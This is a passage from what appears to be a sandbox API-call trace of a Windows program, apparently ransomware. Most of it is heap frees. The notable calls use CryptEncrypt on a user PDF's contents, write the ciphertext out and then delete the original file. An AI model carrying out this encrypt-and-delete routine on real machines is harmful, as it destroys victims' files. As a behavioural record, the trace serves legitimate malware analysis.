dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0079.096] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.096] CryptGetKeyParam (in: hKey=0x41ac000, dwParam=0x7, pbData=0x43e2730, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2730*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.098] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.099] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.099] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.100] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.100] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.100] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.101] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.101] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.101] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xba63, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xba70) returned 1 [0079.101] CharLowerBuffW (in: lpsz="byte[47729]", cchLength=0xb | out: lpsz="byte[47729]") returned 0xb [0079.103] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.103] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0079.103] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb228, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0079.103] CryptEncrypt (in: hKey=0x41ac000, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49bcf58*, pdwDataLen=0x144e538*=0xba63, dwBufLen=0xba70 | out: pbData=0x49bcf58*, pdwDataLen=0x144e538*=0xba70) returned 1 [0079.123] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.123] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.123] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.124] WriteFile (in: hFile=0x258, lpBuffer=0x49a5a80*, nNumberOfBytesToWrite=0xba70, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49a5a80*, lpNumberOfBytesWritten=0x144ef3c*=0xba70, lpOverlapped=0x0) returned 1 [0079.126] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0079.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.126] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0079.126] CryptDestroyKey (hKey=0x41ac000) returned 1 [0079.126] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.126] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0079.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0079.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.127] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.127] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0079.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.127] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.127] CloseHandle (hObject=0x298) returned 1 [0079.127] CloseHandle (hObject=0x258) returned 1 [0079.145] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf", lpFilePart=0x0) returned 0x2f [0079.145] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0079.145] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ey_dc1tdsg.pdf")) returned 0x20 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.146] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0079.146] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1c80, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xb9a0f690, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xb9a0f690, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0xba63, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eY_Dc1TDsg.pdf", cAlternateFileName="EY_DC1~1.PDF")) returned 0x41ac500 [0079.146] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ey_dc1tdsg.pdf")) returned 1 [0079.149] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1c80, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xb9a0f690, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xb9a0f690, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0xba63, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eY_Dc1TDsg.pdf", cAlternateFileName="EY_DC1~1.PDF")) returned 0 [0079.149] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 